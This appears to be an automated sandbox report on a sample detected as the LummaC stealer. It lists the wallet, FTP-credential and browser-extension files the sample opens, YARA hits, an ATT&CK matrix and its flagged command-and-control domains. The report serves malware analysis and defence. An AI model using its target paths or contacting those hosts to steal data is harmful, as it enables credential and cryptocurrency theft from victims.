              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.dbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2173115481.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172101207.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172144861.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2173067791.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172193519.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2173166393.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172553659.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2134170058.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171729321.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172598714.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2147519719.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2134331985.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171672150.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2171626305.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2172650183.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2185006913.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		12
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory1
              Query Registry              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager161
              Security Software Discovery              		SMB/Windows Admin Shares2
              Clipboard Data              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information              		NTDS12
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              6RVmzn1DzL.exe18%ReversingLabs
              6RVmzn1DzL.exe19%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://www.yubsoft.com%dshell32.dllSHGetDesktopFolderSHCreateShellItem0%Avira URL Cloudsafe
              https://contintnetksows.shop/100%Avira URL Cloudmalware
              https://github.com/imgdrive/Folder2ISOhttps://github.com/imgdrive/Folder2ISO/issuesVIDEO_TSBDMVBDAVA0%Avira URL Cloudsafe
              http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt00%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://contintnetksows.shop/p1100%Avira URL Cloudmalware
              http://ocsps.ssl.com0?0%Avira URL Cloudsafe
              https://contintnetksows.shop/apien0100%Avira URL Cloudmalware
              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_0%Avira URL Cloudsafe
              https://contintnetksows.shop/apirofi100%Avira URL Cloudmalware
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl00%Avira URL Cloudsafe
              https://contintnetksows.shop/apin100%Avira URL Cloudmalware
              http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl00%Avira URL Cloudsafe
              https://www.ssl.com/repository00%Avira URL Cloudsafe
              towerxxuytwi.xyz100%Avira URL Cloudmalware
              http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q0%Avira URL Cloudsafe
              http://ocsps.ssl.com00%Avira URL Cloudsafe
              https://contintnetksows.shop/apiz100%Avira URL Cloudmalware
              https://github.com/imgdrive/Folder2ISO/issues0%Avira URL Cloudsafe
              https://contintnetksows.shop/apih100%Avira URL Cloudmalware
              https://contintnetksows.shop:443/apiK100%Avira URL Cloudmalware
              contintnetksows.shop100%Avira URL Cloudmalware
              https://support.mozilla.org/products/firefoxgro.all0%Avira URL Cloudsafe
              https://contintnetksows.shop/a7100%Avira URL Cloudmalware
              https://contintnetksows.shop/apiassw100%Avira URL Cloudmalware
              https://contintnetksows.shop/pp100%Avira URL Cloudmalware
              https://contintnetksows.shop/apieppgd100%Avira URL Cloudmalware
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://contintnetksows.shop:443/api_storageCJ100%Avira URL Cloudmalware
              https://www.yubsoft.com0%Avira URL Cloudsafe
              https://contintnetksows.shop/apiT100%Avira URL Cloudmalware
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://contintnetksows.shop:443/api)100%Avira URL Cloudmalware
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://contintnetksows.shop/%%100%Avira URL Cloudmalware
              https://contintnetksows.shop:443/api100%Avira URL Cloudmalware
              penetratedpoopp.xyz100%Avira URL Cloudmalware
              ellaboratepwsz.xyz100%Avira URL Cloudmalware
              swellfrrgwwos.xyz100%Avira URL Cloudmalware
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%Avira URL Cloudsafe
              https://contintnetksows.shop/api100%Avira URL Cloudmalware
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%Avira URL Cloudsafe
              https://contintnetksows.shop/e100%Avira URL Cloudmalware
              http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl00%Avira URL Cloudsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%Avira URL Cloudsafe
              http://crls.ssl.com/ssl.com-rsa-RootCA.crl00%Avira URL Cloudsafe
              foodypannyjsud.shop100%Avira URL Cloudmalware
              pedestriankodwu.xyz100%Avira URL Cloudmalware
              https://contintnetksows.shop/a100%Avira URL Cloudmalware
              https://contintnetksows.shop/s8100%Avira URL Cloudmalware
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%Avira URL Cloudsafe
              https://github.com/imgdrive/Folder2ISO0%Avira URL Cloudsafe
              potterryisiw.shop100%Avira URL Cloudmalware
              https://contintnetksows.shop/api$100%Avira URL Cloudmalware
              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt00%Avira URL Cloudsafe
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
              https://contintnetksows.shop/s100%Avira URL Cloudmalware
              https://contintnetksows.shop/p100%Avira URL Cloudmalware
              https://contintnetksows.shop/api%100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              contintnetksows.shop
              		172.67.141.234
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                towerxxuytwi.xyztrue
                • Avira URL Cloud: malware
                		unknown
                contintnetksows.shoptrue
                • Avira URL Cloud: malware
                		unknown
                penetratedpoopp.xyztrue
                • Avira URL Cloud: malware
                		unknown
                ellaboratepwsz.xyztrue
                • Avira URL Cloud: malware
                		unknown
                swellfrrgwwos.xyztrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/apitrue
                • Avira URL Cloud: malware
                		unknown
                foodypannyjsud.shoptrue
                • Avira URL Cloud: malware
                		unknown
                pedestriankodwu.xyztrue
                • Avira URL Cloud: malware
                		unknown
                potterryisiw.shoptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtab6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/p16RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.yubsoft.com%dshell32.dllSHGetDesktopFolderSHCreateShellItem6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://ocsps.ssl.com0?6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/apien06RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://github.com/imgdrive/Folder2ISOhttps://github.com/imgdrive/Folder2ISO/issuesVIDEO_TSBDMVBDAVA6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/apirofi6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://ocsps.ssl.com06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/apin6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://x1.c.lencr.org/06RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://x1.i.lencr.org/06RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.ssl.com/repository06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/apiz6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://github.com/imgdrive/Folder2ISO/issues6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop:443/apiK6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/apiassw6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/pp6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://support.mozilla.org/products/firefoxgro.all6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/apih6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/a76RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/apieppgd6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop:443/api_storageCJ6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
